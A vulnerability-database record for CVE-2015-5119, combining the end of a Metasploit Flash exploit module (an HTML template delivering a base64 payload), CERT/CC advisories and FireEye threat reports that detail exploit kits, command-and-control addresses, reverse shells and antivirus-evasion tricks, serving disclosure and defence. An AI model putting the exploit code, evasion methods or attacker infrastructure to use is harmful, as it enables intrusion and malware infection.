codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb"}], "cert": [{"lastseen": "2019-05-22T16:50:33", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the MSHTML CMarkup component, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the CMarkup component of the MSHTML library. This can allow for arbitrary code execution. We have confirmed Internet Explorer 10 to be vulnerable. It has been [reported](<http://arstechnica.com/security/2014/02/new-zero-day-bug-in-ie-10-exploited-in-active-malware-attack-ms-warns/>) that Internet Explorer 9 is also affected. Other versions of Internet Explorer may also be affected.\n\nNote that this vulnerability is being [exploited in the wild](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>), and the exploit code is publicly available. The exploit in the wild currently only targets Internet Explorer 10 on systems that have Adobe Flash installed and do **not** have EMET installed. Windows 8 comes with Flash, so no additional software is required to be vulnerable to this particular exploit on that platform. Although no Flash vulnerability appears to be at play here, the Internet Explorer vulnerability is used to corrupt Flash content in a way that allows ASLR to be bypassed via a memory address leak. This is made possible with Internet Explorer because Flash runs within the same process space as the browser. The Flash content uses this ASLR bypass to disable DEP and then execute code. The [Microsoft.XMLDOM ActiveX control is used to determine](<http://www.kb.cert.org/vuls/id/539289>) if EMET is installed on the target system. This is done by checking for the presence of `C:\\Windows\\AppPatch\\EMET.dll`. If this file is present, the exploit attempt is aborted. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Install the Microsoft Fix it** \n[Microsoft Security Advisory (2934088)](<http://technet.microsoft.com/en-us/security/advisory/2934088>) has been released to describe this issue. This advisory references a [Fix it](<http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx>) utility to address this vulnerability. \n \nPlease also consider the following workarounds: \n \n--- \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this vulnerability. CERT/CC has created a [video tutorial for setting up EMET 3.0](<http://www.youtube.com/watch?v=28_LUs_g0u4>) on Windows 7. Note that platforms that do not support ASLR, such as Windows XP and Windows Server 2003, will not receive the same level of protection that modern Windows platforms will. \n \n**Update to Internet Explorer 11** \n \nThe public exploit for this vulnerability does not work with Internet Explorer 11. \n \n--- \n \n### Vendor Information\n\n732479\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Microsoft Corporation\n\nNotified: February 14, 2014 Updated: February 19, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://technet.microsoft.com/en-us/security/advisory/2934088>\n * <http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 9.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://technet.microsoft.com/en-us/security/advisory/2934088>\n * <http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx>\n * <http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>\n * <http://community.websense.com/blogs/securitylabs/archive/2014/02/14/msie-0-day-exploit-cve-2014-0322-possibly-targeting-french-aerospace-organization.aspx>\n * <http://arstechnica.com/security/2014/02/new-zero-day-bug-in-ie-10-exploited-in-active-malware-attack-ms-warns/>\n * <http://www.seculert.com/blog/2014/02/0-day-attack-targets-aerospace-companys-remote-users.html>\n * <http://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/>\n * <https://sites.google.com/site/zerodayresearch/smashing_the_heap_with_vector_Li.pdf>\n\n### Acknowledgements\n\nThis vulnerability was publicly reported by FireEye. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0322](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0322>) \n---|--- \n**Date Public:** | 2014-02-13 \n**Date First Published:** | 2014-02-14 \n**Date Last Updated: ** | 2014-02-20 01:47 UTC \n**Document Revision: ** | 46 \n", "modified": "2014-02-20T01:47:00", "published": "2014-02-14T00:00:00", "id": "VU:732479", "href": "https://www.kb.cert.org/vuls/id/732479", "type": "cert", "title": "Internet Explorer CMarkup use-after-free vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-21T16:50:31", "bulletinFamily": "info", "description": "### Overview \n\nAdobe Flash Player contains a vulnerability in the ActionScript 3 ByteArray class, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nAdobe Flash Player versions 9.0 through version 18.0.0.194 contain a use-after-free vulnerability in the [AS3 ByteArray class](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>). This can allow attacker-controlled memory corruption. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nAn attacker can execute arbitrary code in the context of the user running Flash Player. Attacks typically involve enticing a user to visit a web site containing specially-crafted Flash content, or to open a specially-crafted Microsoft Office document. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue is addressed in Flash Player Desktop 18.0.0.203. Please see [Adobe Security Bulletin APSB15-16](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) for more details and fix versions for other platforms. \n \n--- \n \n**Do not run untrusted Flash content** \n \nTo defend against this and other, as yet unknown vulnerabilities, disable Flash in your browser or enable [Click-to-Play](<http://www.howtogeek.com/188059/how-to-enable-click-to-play-plugins-in-every-web-browser>) features. Adobe has also provided instructions for how to [uninstall Flash on Windows](<https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-windows.html>) and [Mac](<https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-mac-os.html>) platforms. \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://www.microsoft.com/emet>) (EMET) can be used to help prevent exploitation of this vulnerability. In particular, Attack Surface Reduction (ASR) can be configured to help restrict Microsoft Office and Internet Explorer from loading the Flash ActiveX control. \n \n--- \n \n### Vendor Information\n\n561288\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Adobe\n\nNotified: July 06, 2015 Updated: July 08, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 7.1 | E:H/RL:W/RC:C \nEnvironmental | 7.1 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>\n * <https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>\n * <https://twitter.com/w3bd3vil/status/618168863708962816>\n * <http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>\n * <http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>\n * <http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/>\n * <http://www.microsoft.com/emet>\n\n### Acknowledgements\n\nThis vulnerability was discovered by HackingTeam. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-5119](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5119>) \n---|--- \n**Date Public:** | 2015-07-05 \n**Date First Published:** | 2015-07-07 \n**Date Last Updated: ** | 2015-07-11 18:39 UTC \n**Document Revision: ** | 37 \n", "modified": "2015-07-11T18:39:00", "published": "2015-07-07T00:00:00", "id": "VU:561288", "href": "https://www.kb.cert.org/vuls/id/561288", "type": "cert", "title": "Adobe Flash ActionScript 3 ByteArray use-after-free vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "description": "\n\nThreat Overview\n\nThe online advertisements that people see across a wide range of popular and lesser-known websites can lead to malware infections and other forms of compromise, sometimes without any user interaction whatsoever and without any indicators there is an issue.\n\nThis emerging threat is known as malvertising (a portmanteau of \u2018malicious\u2019 and \u2018advertising\u2019), and FireEye Labs recently uncovered an ongoing campaign involving online advertising network onclickads[.]net, a domain with an Alexa global rank of 39 and 113 in the United States. Onclickads[.]net is operated by Propeller Ads Media, an online advertising exchange.\n\nIn this case, websites serving ad content from onclickads[.]net could infect visitors by first redirecting them to the Rig Exploit Kit. An exploit kit is essentially a toolkit that automatically targets specified software vulnerabilities \u2013 primarily to distribute malware.\n\nThe FireEye Dynamic Threat Intelligence (DTI) first detected the malvertising activity on Oct. 6, 2015, and the campaign is still active today. Those redirected to the Rig Exploit Kit landing page could be compromised via exploits targeting Adobe Flash, Internet Explorer, Java and Microsoft Silverlight.\n\nFor the everyday Internet user, the threat would play out like this: The user navigates to a website; the website serves a malicious advertisement from onclickads[.]net; the user is redirected to the Rig Exploit Kit landing page and one of several vulnerabilities is targeted.\n\nFor this particular campaign, a completely successful attack results in the user becoming infected with malware.\n\nTechnical Details\n\nDTI detected Rig Exploit Kit URLs on a daily basis and each URL had a similar HTTP Referer header field belonging to onclickads[.]net, as shown in Figure 1.\n\n\n\nFigure 1. Example onclickads[.]net referers seen redirecting to Rig Exploit Kit\n\nMalvertising attacks can be difficult to identify, but in this case, as shown in Figure 2, it starts with a normal looking ad content HTTP GET request made when visiting a site that serves ad content from onclickads[.]net.\n\n\n\nFigure 2. GET request to onclickads[.]net\n\nLooking a little closer, we see that the URL contains strings that slightly resemble those used by OpenX/Revive ad servers, one the most popular ad software systems on the market.\n\nCommonly seen, legitimate OpenX/Revive URLs might look something like this:\n\n/www/delivery/afr.php?zoneid=8&amp;cb=1925363925374\n\nWe checked out a copy of the OpenX repository to review the contents. While the repository contains a legitimate file named afr.php, there was no file named afu.php as shown in the GET request from Figure 2.\n\nAlthough ad servers are often abused by malvertisers, OpenX systems and their associated URLs are normally not an indication of malicious activity, just advertising activity; so it\u2019s common to see them mixed in with other HTTP traffic in most network environments. You can see how the malicious traffic associated with this malvertising campaign might slip by with other OpenX advertising traffic since it closely resembles that of a legitimate ad system.\n\nOnclickads[.]net appears to have previously been involved in malvertising activity. The online advertising network was recently used in a similar campaign involving the Angler Exploit Kit, and \u2013 as seen in Figure 3 \u2013 we have still observed redirections to fake Flash media players.\n\n\n\nFigure 3. Some referer URLs redirected to fake media players when visited\n\nAs mentioned before, those who are redirected to the Rig Exploit Kit landing page could be compromised via exploits targeting Adobe Flash, Internet Explorer, Java and Microsoft Silverlight.\n\nExamples of Rig Exploit Kit landing page URLs we logged can be seen in Figure 4. These all had an onclickads[.]net URL (similar to Figure 1) in the referer field.\n\n\n\nFigure 4. Rig Exploit Kit URLs\n\nAs shown in Figure 5, the Rig Exploit Kit obfuscates its landing pages to make analysis and detection tougher. The landing page contains code that checks for the presence of antivirus or virtual environments \u2013 if either is detected by the exploit kit, the exploit will not be served.\n\n\n\nFigure 5. Obfuscated Rig Exploit Kit landing page\n\nThe samples we analyzed used an exploit for CVE-2015-5119, the Adobe Flash use-after-free vulnerability revealed in the Hacking Team leak. As mentioned [here](<http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>), CVE-2015-5119 was integrated into Rig Exploit Kit in July. After the landing page loads, the Flash exploit is downloaded, as seen in Figure 6.\n\n\n\nFigure 6. Flash exploit being downloaded\n\nAfter successful exploitation, the payload downloads malware to the system.\n\nAs of Nov. 13, 2015, the exploit kit is redirecting to Magnitude EK URLs. Some example Magnitude EK URLs look like this: \n \n6d3bd.439.74331q.436161bv.0ecu.u677n.2401q.p44m.l0sm6dacs2.eventsam.pw/?2d5f484b42434e41444e464c495e03434859 \nmebf65l.c06a2r.ldfbk.zd899fu.w54358p.hf47613b.u90.y99xvzga7k95.satshares.pw/?225047444d4c414e4b41494346510c4c4756 \nl9077e2v.he02528l.obdb52x.34aa9.z144.8d3d49.j0i.w687g98o.hairunits.pw/?2b594e4d444548474248404a4f5805454e5f \n \n\n", "modified": "2015-11-13T13:32:25", "published": "2015-11-13T13:32:25", "id": "FIREEYE:C1FB4B9FAC84D1B9FD74A7D5A588D1D2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/top-ranked_advertisi.html", "title": "Top-ranked Advertising Network Leads to Exploit Kit", "type": "fireeye", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "description": "We would like to introduce the first of our \u201cGhosts in the Endpoint\u201d series, a report prepared by FireEye Labs that documents malicious software not being detected in the wild by traditional signature-based detections.\n\nIn this study, all the families identified are samples from VirusTotal (VT) with zero detections, but detected as malicious by our Multi-Vector Virtual Execution (MVX) Engine. We also added a few samples with very low detection rates (VT &lt;=3) but with interesting bypass techniques.\n\nOur goal is to share indicators that help the AV community and others improve their detection coverage.\n\n##### **Scope**\n\n * So far, only samples found in VT with the following file types were included in this study:\n * Win32 binaries\n * Office documents (including Open XML format)\n * RTF documents\n * Hangul Word Processor (HWP)[1] documents\n\nThe study includes samples submitted to VT in 2015 that were still found undetected or with minimal detection rates as of January 2016 (see VT detection Tables in the Appendix). \n\n##### **Findings**\n\nThe following samples were identified in our research:\n\n**Suspected APT malware:**\n\n 1. **GOODTIMES backdoor**: Suspected APT; MS Office with Embedded Hacking Team Flash Exploit\n 2. **UPS backdoor: **Suspected APT3\n 3. **VBA Macro + Metasploit Shellcode Loader:** Suspected Middle Eastern-based APT\n 4. **Hancom Office HWP Exploit:** Possible APT targeting of South Korea.\n\n**Malware without attribution:**\n\n 1. **OccultAgent**: (New) Code hidden in Excel spreadsheet\n 2. **Spy-Net RAT**: Targeting Brazilian victims\n 3. **VBA Macros + PowerShell scripts:** Netcat Backdoor\n 4. **VBA Macros + Python scripts:** Metasploit Shellcode Loader\n 5. **Office Downloader**\n\n##### **Detailed Sample Analysis**\n\nMalware that remains undetected by more than 56 different AV vendors over a long period of time is worth investigating. This section briefly describes the malware and techniques identified in the undetected samples. A full list of indicators can be found in the IOC section at the end.\n\n**1\\. 4b3858c8b35e964a5eb0e291ff69ced6** \\- 201507.xlsx\n\nType: XLSX \nDescription: CVE-2015-5119 (Flash exploit exposed in the Hacking Team leak) \nAttribution: Suspected APT threat group targeting Taiwan \nCurrent detection: 0/53 \nFirst Submission: July 13, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 6 months \n\n\nThis Excel document is PKZIP compressed (following the Open XML Format) with the structure shown in Figure 1:\n\n\n\nFigure 1: Structure of XLSX document\n\nWhen the spreadsheet is opened, a dialog prompts the victim to allow unknown embedded content to be played, as shown in Figure 2. In this case, social engineering is needed to convince the victim to execute the malicious Flash object.\n\n\n\nFigure 2: Excel document content and prompt\n\nWhen the victim allows the embedded content to be played, the activeX1.xml file is read to locate the OLE Control to be used (which corresponds to Macromedia Flash Player, as shown in Figure 3) through the ClassID attribute to finally load the Flash Exploit embedded in the activeX1.bin object.\n\n\n\nFigure 3: Content of activeX1.xml file\n\nThe embedded Flash exploit corresponds to CVE-2015-5119, one of several zero-day exploits identified following the Hacking Team leak in July 2015.[2]\n\nA look at the Flash Action Script (AS) reveals code similar to that from the Hacking Team Exploit, such as the class name exp1_fla/MainTimeLine, the function name TryExpl() with the same use-after-free technique, and even the same error message \u201ccan\u2019t cause UaF\u201d as shown in Figure 4.\n\n\n\nFigure 4: Flash exploit code\n\nThe combination of the class name exp1_fla() and classes ShellMac64, ShellWin32 and ShellWin64 built into the exploit (see Figure 5) were not observed in the original Hacking Team version of the exploit, suggesting that the group responsible for this malicious Excel file modified the original exploit code.\n\n\n\nFigure 5: Flash Action Script classes from malicious Excel file\n\nThe exploit drops a variant of the backdoor we call GOODTIMES (also known as Linopid). The backdoor communicates to Taiwan-based IP addresses 220.128.223.75 and 220.134.47.67 on ports 8080 and 443 via HTTP.\n\nWhile this particular GOODTIMES sample has not been attributed to a specific threat group, GOODTIMES has previously been used by suspected APT actors. Based on previously identified targets and the use of Traditional Chinese language and Taiwan-centric themes in spear phishing messages and decoy documents, the group appears to focus on Taiwanese targets.\n\n##### **Potential AV bypassing reason**\n\n1\\. New delivery mechanism: The leaked CVE-2015-5119 Flash exploit has been used by a wide range of threat groups, including other APT groups such as APT3 and APT18[3]. Previous delivery methods entailed luring the victim to click on a malicious link (delivered via a spear phishing message) where the malicious Flash exploit was hosted on a web page. In this case, the suspected APT group responsible for the GOODTIMES backdoor changed the **delivery mechanism** by embedding the exploit as ActiveX object inside the Excel Open XML Format (PKZIP compressed).\n\n2\\. In addition, while an ActiveX object would normally be embedded inside a Compound File Binary Format[4], in this case the uncompressed Flash content is embedded directly in the Excel file, right after the ClassID, as shown at Figure 6.\n\n\n\nFigure 6: Embedded Flash object\n\n\u00b7 The above steps might be enough to avoid proper parsing of the malicious Flash object. This is the first time we have seen a CVE-2015-5119 sample embedded in an Excel document this way.\n\n**2\\. 22da029dd4e018b7c7135a03d0ba9b99**\n\nType: Win32 binary \nDescription: A variant of the UPS backdoor \nAttribution: suspected APT3 \nCurrent detection: 0/57 \nFirst Submission: August 6, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months\n\nUPS is a backdoor capable of uploading and downloading files, creating a reverse shell, reconfiguring itself to use different command and control (CnC) servers, and acting as a proxy server. It uses a custom binary protocol to communicate with its CnC server and it encrypts this custom protocol using a TLS TCP connection.\n\nWhile this particular UPS sample has not been attributed, UPS is commonly used by the China-based APT3.\n\n**Potential AV bypassing reason**\n\n1\\. Junk code insertion: Examining this UPS sample, we see a significant amount of \u201cjunk code\u201d potentially designed to mask the malicious nature of the binary, as well as to complicate analysis or reverse engineering efforts.\n\nIn Figure 7 we see the backdoor executing a jump to address 0x4043AB by forcing the \u201cjump if greater than\u201d comparison to be true by moving a large value (0x4A2E88E4) to the ebx register and then comparing it with a hardcoded lower value (0x6A1E839), after which a large number of junk instructions are skipped (red square). This strategy can be seen through several different execution paths.\n\n\n\nFigure 7: Decompiled UPS sample showing junk code\n\n**3\\. aedd5d8446cc12ddfdc426cca3ed8bf0 - **S-old.xlsb****\n\nType: XLSB \nDescription: VBA Macro + Metasploit Shellcode Loader Backdoor \nAttribution: Suspected Middle Eastern-based APT \nCurrent detection: 1/52 \nFirst Submission: September 28, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 4 months\n\nThis particular sample, an Excel Binary Workbook file,[5] has only one generic detection on VT, so we believe it is still worth mentioning in this report.\n\nWhen the spreadsheet is opened, the victim is shown a table of Israeli holidays and prompted to enable macros to view the full list, as shown in Figure 8:\n\n\n\nFigure 8: Malicious Excel file showing calendar data\n\nWhen the macro is executed it creates a Windows binary in memory as shown in Figure 9. Note the Chr(77) + Chr(90) builds the MS-DOS header magic number \u201cMZ\u201d.\n\n\n\nFigure 9: Macro concatenating bytes to form a Windows binary\n\nThe binary is written to the file system with the file name NTUSER.dat{**GUID**}.exe as shown in Figure 10.\n\n\n\nFigure 10: Creating the Windows binary\n\nIn this case, the GUID selected corresponds to Scriptlet.TypeLib ActiveX object, creating the file name NTUSER.dat{FB9D87AE-8FEA-4583-98AB-2FB396EAB5FC}.exe (md5 6aab47b18afacbfa7423f09bd1fa6d25) that is later executed via the ShellExecute() API with the SW_HIDE parameter to run silently.\n\nFinally, the executable comes with an embedded Metasploit Shellcode loader that connects to 84.11.146.62 on port TCP 13661.\n\nWhile this sample has not been attributed, similar techniques (use of XLSB files with embedded, obfuscated macros; creation of the file name NTUSER.dat{GUID}.exe; use of the binary to download additional malware) and the same CnC IP address have been referenced in reporting on a suspected Middle Eastern-based APT group known as \u201cRocket Kitten\u201d, primarily targeting Middle Eastern and European organizations.\n\n**_Potential AV bypassing reason_**\n\n1\\. The byte concatenation inside the VBA Macro, used to build a Win32 binary at runtime, helps to bypass signature-based detection.\n\n**4\\. 4e51143b01e99afc3bd908794d81d3cb** \nType: HWP \nDescription: Hancom Office HWP Exploit \nAttribution: None \nCurrent detection: 3/53 \nFirst Submission: July 31, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months with 3 generic detections\n\nThis sample, a Hangul Word Processor (HWP) document, has only three generic detections on VT, so we found it to be worth analyzing for this report.\n\nWhen opened, the HWP document displays Korean text and some photographs, as shown in Figure 11. Behind the scenes the document will exploit vulnerable versions of Hancom Office, dropping and executing a malicious file.\n\n\n\nFigure 11: Content of malicious HWP document\n\nInternally, the document structure includes three sections, where section 0 will trigger a Type Confusion vulnerability while parsing the content of the paragraph located at the data record structure HWPTAG_PARA_TEXT starting at offset 0x1C (see uncompressed section 0 at Figure 12). The logic bug will cause the string starting at offset 0x50 to be treated as a control structure. This control structure contains a fake object at offset 0x56 pointing to an address (0x0e0a0e0a) filled by a heap spray that eventually will redirect the execution flow to the shellcode.\n\n\n\nFigure 12: Section0 malformed paragraph\n\nA similar type confusion vulnerability has been previously documented by Ahnlab,[6] however, the vulnerability trigger is different.\n\nSection 2 has an uncompressed size equal to 112MB, used to perform the heap spray and expecting to place the shellcode at a memory address close to 0x0e040e04. In Figure 13, the beginning of the shellcode can be seen (uncompressed).\n\n\n\nFigure 13: Start of shellcode\n\nThe shellcode drops a file on disk and executes it via HncBLXX.HncShellExecute-&gt; SHELL32.ShellExecute. This generates a connection to a compromised Korean automotive website and attempts to retrieve a file with a .JPG extension, which we suspect may be a second-stage binary. However, the file was no longer available on the website at the time of our analysis.\n\nThis particular sample has not been attributed to any threat group. However, the use of malicious HWP documents is notable, as that format is specific to a regional word processing program used heavily in South Korea and in particular by the South Korean government. While the use of malicious HWP files could simply indicate regional targeting by unspecified threat actors, similar exploits have been used in the past by suspected APT groups.\n\n**Potential AV bypassing reason**\n\n1\\. Heap Spray technique change: Similar exploits used to be created with multiple large-size sections in order to spray the heap. This exploit fulfills the same purpose but with only one large-size section.\n\n2\\. Vulnerability triggered in a different format: A similar type confusion vulnerability described in this section was seen implemented in the Open XML Format (HWPX extension)[7], but this time ported to the Compound File Binary Format (HWP extension).\n\n**5\\. 497eddab53c07f4be1dc4a8c169261a5** \\- Barclays_Q22015_IMS_excel_tables.xlsm\n\nType: XLSM \nDescription: **VBA Macro + VBScript generated from spreadsheet** \nAttribution: None \nCurrent detection: 1/54 \nFirst Submission: Julio 08, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 7 months\n\nThis sample, an Excel macro-enabled file, has only one generic detection. The embedded macro creates an encoded Visual Basic (VBE) file that connects to a CnC site and allows remote control of the victim\u2019s computer. As we had not previously observed this backdoor, we named it OccultAgent.\n\nWhen the XLSM file is opened, the user is prompted to enable macros, as shown in Figure 14. The instructions are displayed in both English and Greek:\n\n\n\nFigure 14: Prompt to enable macros\n\nThe macro drops an encoded VBScript file named ocagent.vbe (69df0c3bab5e681c2e5eb5951a64776e), obtained from the data in a spreadsheet cell (see Figure 15), to C:\\octemp001\\ and executes it. The script connects to hxxp://0x5E469BFD, which is equivalent to hxxp://94.70.155.253, via the victim\u2019s web browser.\n\n\n\nFigure 15: Obfuscated script embedded in spreadsheet cell\n\nThe first stage Macro source code can be seen in Figure 16.\n\nFigure 16: Embedded VBA macro\n\nThe dropped ocagent.vbe VBScript is essentially a backdoor that connects to the CnC server at 94.70.155.253 to register the victim\u2019s computer and to obtain commands to run on the victim\u2019s machine.\n\n**Potential AV bypassing reason**\n\nThe following steps may be sufficient to bypass AV detection:\n\n1\\. Adding encoded VB script into a spreadsheet cell allows attackers to hide the malicious code.\n\n2\\. Representing the IP address in hexadecimal format may be sufficient to bypass regular expressions trying to match standard 32-bit IP addresses (dotted decimal notation).\n\n**6\\. dc15336e7e4579c9c04c6e4e1f11d3dd - **dedinho no cuzinho.rtf\n\nType: RTF \nDescription: RTF file with embedded executable \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: October 22, 2015 \nLast Submission: January 15, 2016 \nTime undetected in VT: At least 3 months\n\nIn this attack scenario, the victim receives an RTF document that appears to contain an embedded JPG image. The embedded file is actually an executable that attempts to hide its file extension by using a long sequence of underscore characters (e.g., Copy of foto.jpg&lt;underscores&gt;.exe (see Figure 17).\n\nFigure 17: RTF document with embedded file\n\nThe embedded binary (d409dc7e1ca0c86cb71e090591f16146) is packed with RLPack[8]. It drops a second Borland Delphi binary packed with a customized version of UPX, which will then drop the Spy-Net RAT on the system.\n\nSpy-Net[9] allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, run processes and services, capture images of the desktop, and record from the webcam and microphone. It also contains functionality to extract saved passwords and turn the victim into a proxy server. \n\nA beacon to dennyhacker[.]no-ip.org on TCP port 81 prepended with an ASCII representation of the length of the payload (33) and followed by a pipe and a new line character confirms Spy-Net activity:\n\n00000000 33 33 7c 0a 33|.\n\nThe RAT commands are translated to Portuguese to adapt the attack to Brazilian victims; some command examples are shown below (additional commands are listed in the Appendix):\n\nConfiguracoesdoserver = Server settings \nListarjanelas = List windows \nFinalizarconexao = End connection \nListarchaves = List keys\n\n**Potential AV bypassing reason**\n\n1\\. Packers are commonly used to obfuscate code in order to bypass traditional signature-based detection. The use of multiple files packed with two different packers may be sufficient to bypass detection.\n\n**7\\. b1f43ca11dcf9e60f230b9d6d332c479** \u2013 Book2 - Copy.xls\n\nType: XLSX \nDescription: VBA + Python Shellcode loader \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: September 20, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 6 months\n\nWhen opened, this Excel document appears to be blank but contains the VBA macro shown in Figure 18.\n\n\n\nFigure 18: VBA Macro with OLE Object\n\nThe macro will instantiate an OLE Object and load it via the xlVerbPrimary verb. The embedded OLE object contains two files:\n\n * python27.dll (md5 7e6dd0d7cb29103df4a592e364680075) - a legitimate file\n * file.exe (md5 73f16dbf535042bc40e9c663fe01c720) - a binary created with py2exe[10]\n\nOnce file.exe is executed it launches a copy of the Windows calculator (calc.exe) as a decoy. However, behind the scenes it performs a Metasploit reverse TCP Connect to a CnC server.\n\nThe unpacked version of file.exe is obfuscated python that can be seen in Figure 19.\n\n\n\nFigure 19: Python Shellcode\n\nThe following steps describe the process in greater detail:\n\n * File.exe spawns a copy of calc.exe.\n * Base64-decode and AES-decrypt embedded shellcode.\n * Via Python ctypes, the environment is set to run the shellcode loader in memory.\n * The shellcode loader, which has been encoded with the Metasploit Shikata encoder, [11] is configured to connect to the host 31.168.144.18 on port 443.\n * The malware sleeps for 60 seconds and starts again.\n\n**Potential AV bypassing reason** \n\n\nMultiple tricks to evade detection can be seen here:\n\n 1. The file extension of the document is .xls. However, the file is actually an Open XML Format file (.xlsx). This simple trick may bypass extension-based parsers.\n 2. The Embedded OLE object contains a legitimate binary (python27.dll) and a py2exe executable may appear to be a legitimate file.\n 3. The malicious python script is packed using py2exe.\n 4. The Embedded OLE object is extracted from a hidden Sheet3, so the VBA Macro may not appear malicious.\n 5. The shellcode is Base64 encoded and AES encrypted.\n\n**8\\. 